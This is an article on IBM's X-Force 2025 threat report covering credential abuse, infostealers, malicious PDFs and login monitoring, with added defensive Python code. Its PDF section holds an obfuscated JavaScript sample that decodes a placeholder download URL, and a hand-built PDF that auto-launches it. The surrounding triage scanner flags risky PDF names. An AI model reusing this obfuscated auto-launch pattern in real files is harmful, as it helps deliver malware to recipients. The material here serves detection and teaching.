IBM’s X-Force 2025 Threat Intelligence Index points to a troubling trend: in nearly one-third of the intrusions X-Force responded to, attackers got in with valid login credentials, stolen or bought, rather than by brute-forcing their way in.
According to the report, 30% of incident response cases involved attackers using valid account credentials for initial access. That puts credential abuse level with exploitation of public-facing applications as the most common way into a victim’s environment.
The shift shows how attackers are adapting. They increasingly prefer credential theft to deploying malware up front because it lets them “log in” instead of “break in”: a valid credential passes every authentication check, so the session looks like a legitimate user’s, perimeter and signature-based controls have nothing to fire on, and detection comes down to noticing behaviour that is out of character for that account.
Credential Theft on the Rise
Credential harvesting was the most common impact on victims, seen in 28% of incidents. Once attackers hold working usernames and passwords they can move laterally through a network while blending into normal account activity.
The report also shows that the Asia-Pacific region has seen a 13% rise in cyber attacks. This area now accounts for 34% of global incidents, largely because of its key role in supply chains and technology manufacturing.
Phishing and Infostealers Surge
IBM analysts noted a significant 84% year-over-year increase in phishing emails delivering infostealers — malware designed to silently collect sensitive information.
“Throughout 2024, we recorded a significant increase in volume, especially in the second half of the year,” IBM’s X-Force team stated.
Attackers also used newer methods such as “attachment hijacking”, in which previously stolen genuine invoice emails are re-sent with the original attachment swapped for malware such as Strela Stealer, so the lure arrives as a message the recipient may already be expecting.
Dark Web Markets Fuel Malware Growth
The report identified a 12% increase in infostealer advertisements on dark web forums. Popular malware families include:
- Lumma
- RisePro
- Vidar
- Stealc
- RedLine
These infostealers run quietly on the infected machine, harvesting browser-saved passwords and session cookies, logging keystrokes, capturing screenshots and collecting financial data, usually without anything visible to the user.
Malicious PDFs and Obfuscation
IBM also highlighted a move away from attachments that carry the malware itself toward more deceptive carriers. PDF files are now the most common type of malicious attachment, and most of them deliver a link or a script rather than an executable payload.
Many of the malicious PDFs analysed use obfuscation to hide where they lead:
- 42% contained obfuscated URLs
- 28% hid URLs inside PDF streams, where the data is usually compressed and invisible to a plain-text scan
- 7% were sent as password-protected (encrypted) files, which a scanner without the password cannot open
A sample of obfuscated JavaScript of the kind embedded in such PDFs might look like this (the domain is a placeholder, not a real indicator):
// String table plus the rotation prelude typical of commercial JavaScript obfuscators.
// The array is shuffled a fixed number of times at load; here it is only a decoy, nothing below reads it.
var _0x4a7b=['charCodeAt','toString','fromCharCode','replace','substr'];
(function(_0x382263,_0x4a7b3c){var _0x34b1c4=function(_0x3db7d0){while(--_0x3db7d0){_0x382263['push'](_0x382263['shift']());}};_0x34b1c4(++_0x4a7b3c);}(_0x4a7b,0x176));
// The indicator that matters: the URL never appears in clear text. It is stored base64-encoded
// and rebuilt only when decodeURL() runs, so a static string scan sees no "http" and no hostname.
var decodeURL = function(){
  // decodes to https://malicious.example.com/download.php?id=1234 (placeholder domain)
  return atob("aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZG93bmxvYWQucGhwP2lkPTEyMzQ=");
};
The URL only exists once the script has run, so an email gateway that scans the attachment for URL strings or known-bad domains finds nothing; catching it means either decoding the embedded literals statically or detonating the file in a sandbox. Note that atob() is a browser and Node.js API used here for illustration: Acrobat’s own JavaScript engine does not expose it, so a real in-PDF payload ships its own short base64 decoder alongside the encoded string.
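The static check that recovers such a hidden link, as an added example that is not from the report or from IBM: a small Python triage script that builds a hand-made PDF whose OpenAction runs JavaScript stored in a FlateDecode stream (the two buckets above, a URL inside a stream and a URL obfuscated as base64), then inflates every stream, decodes long base64 literals and reports the URLs that were not visible in plain text. The PDF layout, the dictionary-name list, the regexes and the sample itself are constructed for this example; the domain is the placeholder from the snippet above.

```python
import base64
import re
import zlib

# --- Constructed sample ------------------------------------------------------
# Hand-built minimal PDF (not a real sample). The script mirrors the snippet
# above: the URL exists only as a base64 literal inside a compressed stream, so
# neither "http" nor the hostname appears as plain text anywhere in the file.
HIDDEN_URL = b"https://malicious.example.com/download.php?id=1234"  # placeholder domain
SAMPLE_JS = (b'var decodeURL=function(){return atob("' + base64.b64encode(HIDDEN_URL)
             + b'");};app.launchURL(decodeURL());')  # app.launchURL is Acrobat's API
_STREAM = zlib.compress(SAMPLE_JS)
_HEADER = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
    b"4 0 obj << /Length " + str(len(_STREAM)).encode() + b" /Filter /FlateDecode >>\nstream\n"
)
SAMPLE_PDF = _HEADER + _STREAM + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

# --- Static triage -----------------------------------------------------------
# Dictionary names worth a second look in an email attachment (assumed list).
RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/URI", b"/EmbeddedFile")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)
URL_RE = re.compile(rb"https?://[\w.\-/?=&%#:+~]+")
B64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def inflate_streams(pdf):
    """Yield every stream body, inflated when it is zlib data.
    decompressobj is used instead of zlib.decompress so a stream whose trailing
    checksum byte was swallowed by the delimiter regex still yields its full
    plaintext instead of raising."""
    for m in STREAM_RE.finditer(pdf):
        body = m.group(1)
        try:
            yield zlib.decompressobj().decompress(body)
        except zlib.error:
            yield body  # not Flate-encoded: scan the raw bytes instead


def decode_base64_literals(data):
    """Return the decoded form of long base64 runs that yield printable text.
    This is the static counterpart of the atob() the script would run."""
    hits = []
    for m in B64_RE.finditer(data):
        token = m.group(0)
        token += b"=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
        if raw and all(0x20 <= c < 0x7F for c in raw):
            hits.append(raw)
    return hits


def scan_pdf(pdf):
    """Triage one PDF: risky names, URLs visible in plain text, and URLs that
    only surface after inflating streams or decoding base64 literals."""
    report = {
        "risky_names": [n.decode() for n in RISKY_NAMES if n in pdf],
        "plain_urls": [u.decode() for u in URL_RE.findall(pdf)],
        "hidden_urls": [],
    }
    for body in inflate_streams(pdf):
        candidates = list(URL_RE.findall(body))
        for blob in decode_base64_literals(body):
            candidates.extend(URL_RE.findall(blob))
        for url in candidates:
            url = url.decode("ascii", "replace")
            if url not in report["plain_urls"] and url not in report["hidden_urls"]:
                report["hidden_urls"].append(url)
    return report


if __name__ == "__main__":
    print(scan_pdf(SAMPLE_PDF))
```

A plain URL grep over the file returns nothing for this sample; only after inflating the stream and decoding the literal does the link appear, which is exactly the gap the report's percentages describe. A production version would also parse object streams, handle the other filters (ASCIIHex, ASCII85, LZW) and treat a password-protected file as suspicious in its own right.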
Cloud Platforms Misused for Phishing
Attackers are increasingly hosting phishing pages and payloads on legitimate cloud platforms. Because the domains and IP ranges belong to well-known providers, URL-reputation filters and allow-lists that trust the provider tend to wave the traffic through.
Frequently abused platforms include:
- secureserver.net
- publiccloud.com.br
- Microsoft Azure Blob Storage
These services have been used to spread banking trojans and credential phishing pages at scale.
IBM’s Security Recommendations
To reduce the risk of credential-based attacks, IBM urges organizations to take the following steps:
- Implement multi-factor authentication (MFA) with phishing-resistant factors such as FIDO2 security keys or passkeys, since SMS codes and push prompts can be phished or relayed
- Monitor login patterns (new countries, devices or networks, impossible travel, off-hours access) and flag deviations from each account’s own baseline
- Deploy detection tooling that can spot credential-theft tactics, from infostealer activity on endpoints to anomalous use of valid accounts
- Train employees to recognize phishing and social engineering attempts
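The login-pattern monitoring recommended above, as an added example that is not IBM’s code or part of the report: a Python rule that walks successful logins in time order and flags a country never seen for that account once it has a baseline, and "impossible travel" where the implied speed from the previous login exceeds an airliner’s. The event format, user names, RFC 5737 documentation addresses, coordinates and thresholds are all constructed for this example.

```python
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sample of authentication events (invented users, documentation
# addresses, rounded city coordinates). One record per line:
#   timestamp user src_ip country lat lon result
# Every SUCCESS line is a login that passed authentication with a valid credential.
EVENTS = [
    "2024-11-04T08:02:11Z alice 203.0.113.7  FR  48.86    2.35 SUCCESS",
    "2024-11-04T09:15:40Z alice 203.0.113.7  FR  48.86    2.35 SUCCESS",
    "2024-11-05T08:10:03Z alice 203.0.113.9  FR  48.86    2.35 SUCCESS",
    "2024-11-06T08:05:19Z alice 203.0.113.7  FR  48.86    2.35 SUCCESS",
    "2024-11-06T08:41:22Z alice 192.0.2.55   SG   1.35  103.82 SUCCESS",  # 36 min after Paris
    "2024-11-06T11:30:00Z bob   198.51.100.4 DE  52.52   13.41 FAILURE",
    "2024-11-06T16:58:51Z bob   198.51.100.4 DE  52.52   13.41 SUCCESS",
    "2024-11-06T23:12:45Z bob   198.51.100.77 BR -23.55  -46.63 SUCCESS",  # ~6 h after Berlin
]

MAX_SPEED_KMH = 900       # faster than an airliner: two logins cannot be one traveller
MIN_BASELINE_LOGINS = 3   # prior logins needed before "new country" means anything
EARTH_RADIUS_KM = 6371.0


def parse_event(line):
    ts, user, src_ip, country, lat, lon, result = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "user": user,
            "src_ip": src_ip, "country": country,
            "lat": float(lat), "lon": float(lon), "result": result}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in degrees."""
    p1, p2 = radians(lat1), radians(lat2)
    dlat, dlon = p2 - p1, radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(p1) * cos(p2) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def detect_anomalies(lines):
    """Walk successful logins in time order and flag:
      new_country       - country never seen for this user once a baseline exists
      impossible_travel - implied speed from the previous login exceeds MAX_SPEED_KMH
    Failed attempts are skipped on purpose: this rule is about credentials that
    worked, not about brute force."""
    history = {}  # user -> prior successful logins, oldest first
    alerts = []
    for ev in map(parse_event, lines):
        if ev["result"] != "SUCCESS":
            continue
        prior = history.setdefault(ev["user"], [])
        reasons = []
        if len(prior) >= MIN_BASELINE_LOGINS and ev["country"] not in {p["country"] for p in prior}:
            reasons.append("new_country")
        if prior:
            last = prior[-1]
            km = haversine_km(last["lat"], last["lon"], ev["lat"], ev["lon"])
            hours = (ev["ts"] - last["ts"]).total_seconds() / 3600.0
            # hours <= 0 covers duplicate or out-of-order timestamps: a real
            # distance with no elapsed time is just as impossible
            if (hours <= 0 and km > 100) or (hours > 0 and km / hours > MAX_SPEED_KMH):
                reasons.append("impossible_travel")
        if reasons:
            alerts.append({"user": ev["user"], "ts": ev["ts"].isoformat(),
                           "src_ip": ev["src_ip"], "country": ev["country"],
                           "prev_country": prior[-1]["country"],
                           "reasons": reasons})
        prior.append(ev)
    return alerts


if __name__ == "__main__":
    for alert in detect_anomalies(EVENTS):
        print(alert)
```

On the sample, alice’s Singapore login fires on both rules, while bob’s Brazil login fires only on impossible travel because two prior logins are too thin a baseline to call a country "new". That cold-start gap is deliberate: a freshly onboarded account needs a different rule (device enrolment, IdP risk signals) rather than a geography baseline it does not yet have, and a real deployment would add device and ASN fingerprints and feed the alert into a step-up MFA challenge rather than a plain log line.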
This latest report serves as a wake-up call for businesses to prioritize identity protection and remain alert to increasingly sophisticated threats that rely less on brute force—and more on stealth.